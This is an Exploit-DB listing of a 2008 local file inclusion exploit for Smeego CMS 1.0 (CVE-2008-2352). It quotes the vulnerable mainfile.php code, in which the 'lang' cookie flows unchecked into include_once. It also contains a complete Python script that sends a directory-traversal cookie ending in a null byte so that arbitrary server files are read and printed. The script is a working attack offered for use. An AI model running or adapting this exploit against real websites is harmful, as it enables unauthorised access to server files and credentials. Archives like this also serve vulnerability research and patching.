Smeego 1.0 - 'Cookie lang' Local File Inclusion

EDB-ID:

5640

CVE:

2008-2352

EDB Verified:

Author:

0in

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-05-17

Vulnerable App: 
# Smeego CMS Local File Include Exploit
# by
# 0in from Dark-Coders Programming & Security Group
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<
#--------------------------------------------------------
# Contact: 0in(dot)email[at]gmail(dot)com
#--------------------------------------------------------
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor
#--------------------------------------------------------
# Description:
# Smeego is a Content Management System or Portal
# System written in PHP and designed to be
# easy to install and use. Smeego has a mature code
# and comes with cool modules and themes
# for you to start your own dynamic and database
# driven website. Bla bla Bla [...]
# -------------------------------------------------------
# Script home: http://smeego.com
# -------------------------------------------------------
# Vuln:
# >>>>>> File: mainfile.php <<<<<<<
#if ($display_errors == 1) { // We don't se any errors ;(
# @ini_set('display_errors', 1);
#} else {
# @ini_set('display_errors', 0);
#}
#
#if (isset($newlang)) {
#
# if (file_exists("language/lang-".$newlang.".php")) {
# setcookie("lang",$newlang,time()+31536000);
# include_once("language/lang-".$newlang.".php");
# $currentlang = $newlang;
# } else {
# setcookie("lang",$language,time()+31536000);
# include_once("language/lang-".$language.".php");
# $currentlang = $language;
# }
#} elseif (isset($lang)) {
#
# include_once("language/lang-".$lang.".php");
# $currentlang = $lang;
#} else {
# setcookie("lang",$language,time()+31536000);
# include_once("language/lang-".$language.".php");
# $currentlang = $language;
#}
# >>>>>> End <<<<<<<
# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print ' Smeego CMS Local File INclude Exploit '
print ' by '
print ' 0in from Dark-Coders Programming & Security Group! '
print ' http://dark-coders.4rh.eu '
print '====================================================='
try:
target=sys.argv[1]
path=sys.argv[2]
file=sys.argv[3]
except Exception:
print '\nUse: %s [target] [path] [file]' % sys.argv[0]
quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
lfi+="../"
print '---------------------------------------------------------'
mysock=httplib.HTTPConnection(target)
mysock=httplib.HTTPConnection(target)
mysock.putrequest("GET",path)
mysock.putheader("User-Agent","Billy Explorer v666")
mysock.putheader('Accept', 'text/html')
mysock.putheader('Accept-Language',' en-us,en;q=0.5')
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
mysock.endheaders()
reply=mysock.getresponse()
print reply.read()
time.sleep(2)
mysock.close()
print '----------------------------------------------------------'

#EOFF

# milw0rm.com [2008-05-17]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services